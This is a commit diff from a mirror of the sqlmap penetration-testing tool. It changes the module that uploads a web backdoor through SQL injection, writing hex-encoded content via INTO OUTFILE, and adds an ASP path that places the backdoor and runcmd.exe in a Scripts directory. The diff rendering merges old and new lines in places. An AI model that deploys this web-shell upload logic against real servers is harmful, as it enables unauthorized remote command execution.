sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-06-18 12:03:14 +03:00
Code Issues Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
Miroslav Stampar 2010-02-24 23:40:56 +00:00
parent 0795e1164d
commit 858cb25975
1 changed files with 23 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
lib/takeover/web.py
View File

@ -23,6 +23,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
""" """
import os import os
import posixpath
import re import re
from extra.cloak.cloak import decloak from extra.cloak.cloak import decloak
@ -86,8 +87,7 @@ class Web:
return retVal return retVal
def __webFileStreamUpload(self, stream, destFileName, directory): def __webFileStreamUpload(self, stream, destFileName, directory):
stream.seek(0) #rewind stream.seek(0) #rewind
if self.webApi in ("php", "asp"): if self.webApi in ("php", "asp"):
multipartParams = { multipartParams = {
"upload": "1", "upload": "1",
@ -109,7 +109,7 @@ class Web:
return False return False
def __webFileInject(self, fileContent, fileName, directory): def __webFileInject(self, fileContent, fileName, directory):
outFile = normalizePath("%s/%s" % (directory, fileName)) outFile = posixpath.normpath("%s/%s" % (directory, fileName))
uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory) uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery) query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
@ -197,7 +197,23 @@ class Web:
infoMsg += "on '%s'" % directory infoMsg += "on '%s'" % directory
logger.info(infoMsg) logger.info(infoMsg)
if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory): if self.webApi == "asp":
runcmdName = 'runcmd.exe'
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, runcmdName + '_'), runcmdName)
scriptsDirectory = "Scripts"
backdoorDirectory = "%s..\%s" % (posixToNtSlashes(directory), scriptsDirectory)
backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory)
backdoorStream.file.truncate()
backdoorStream.read()
backdoorStream.seek(0)
backdoorStream.write(backdoorContent)
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
self.webDirectory = directory
else:
continue
elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
warnMsg = "backdoor hasn't been successfully uploaded " warnMsg = "backdoor hasn't been successfully uploaded "
warnMsg += "with uploader probably because of permission " warnMsg += "with uploader probably because of permission "
warnMsg += "issues." warnMsg += "issues."
@ -209,9 +225,9 @@ class Web:
self.__webFileInject(backdoorContent, backdoorName, directory) self.__webFileInject(backdoorContent, backdoorName, directory)
else: else:
continue continue
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = directory
self.webDirectory = directory
infoMsg = "the backdoor has probably been successfully " infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s', go with your browser " % directory infoMsg += "uploaded on '%s', go with your browser " % directory
infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl